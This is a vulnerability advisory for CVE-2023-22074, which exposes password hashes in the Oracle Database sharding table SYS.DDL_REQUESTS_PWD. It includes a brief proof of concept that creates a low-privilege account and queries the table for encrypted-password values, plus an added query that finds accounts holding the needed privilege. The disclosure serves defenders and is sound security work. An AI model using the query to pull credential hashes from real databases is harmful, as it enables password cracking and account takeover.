- Oracle 19c / 21c Sharding Component Password Hash Exposure
- Authored by Emad Al-Mousa
- Oracle database versions 19.3 through 19.20 and 21.3 through 21.11 have an issue where an account with create session and select any dictionary can view password hashes stored in a system table that is part of a sharding component setup.
- advisories | CVE-2023-22074
- SHA-256 |
d2f153475e1ccb9fba7a3c56502ebe8182c7fe13f5f32cca180c60ebe9c205c7
Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c, 21c [19.3-19.20 and 21.3-21.11]
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa
*****************************************
Vulnerability Details:
A vulnerability exists in the Oracle Database Sharding component of Oracle Database Server. An attacker who compromises an account with the create session and select any dictionary privileges can view password hashes stored in a system table that is part of the sharding component setup.
*****************************************
Proof of Concept (PoC):
I will create an account called “jim” in the pluggable database ORCLPDB1 and grant it the create session and select any dictionary privileges:
SQL> alter session set container=ORCLPDB1;
Session altered.
SQL> create user jim identified by jim123;
User created.
SQL> grant create session,select any dictionary to jim;
Grant succeeded.
I will now connect as the database account “jim”, which is able to view the password hashes in the system table DDL_REQUESTS_PWD used by the database sharding component:
sqlplus "jim/jim123"@ORCLPDB1
SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;
DDL_NUM PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
123 445
E494684108560FFEF1C17CDE72F36A1A
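To triage exposure, the precondition described above (an account holding select any dictionary) can be enumerated in each container. The query below is an added example, not part of the original advisory; it assumes a DBA session in the PDB being reviewed and uses only the standard DBA_SYS_PRIVS, DBA_ROLE_PRIVS and DBA_USERS views.

```sql
-- Added example (not from the advisory): list every user in the current
-- container that holds SELECT ANY DICTIONARY, either granted directly or
-- inherited through a chain of nested roles.
WITH holders (grantee, grant_path) AS (
  -- Anchor: users and roles that were granted the privilege directly.
  SELECT sp.grantee,
         CAST(sp.grantee AS VARCHAR2(4000))
  FROM   dba_sys_privs sp
  WHERE  sp.privilege = 'SELECT ANY DICTIONARY'
  UNION ALL
  -- Recursive step: any user or role that was granted a role
  -- already known to carry the privilege.
  SELECT rp.grantee,
         h.grant_path || ' -> ' || rp.grantee
  FROM   dba_role_privs rp,
         holders h
  WHERE  rp.granted_role = h.grantee
)
SELECT u.username,
       u.account_status,
       u.oracle_maintained,   -- 'N' marks accounts created by the site
       h.grant_path           -- first name is the direct grantee
FROM   holders h,
       dba_users u
WHERE  u.username = h.grantee  -- keep users, drop intermediate roles
ORDER  BY u.oracle_maintained, u.username;
```

Rows with ORACLE_MAINTAINED = 'N' are the ones to review first: application or personal accounts such as the “jim” account in the PoC.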
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074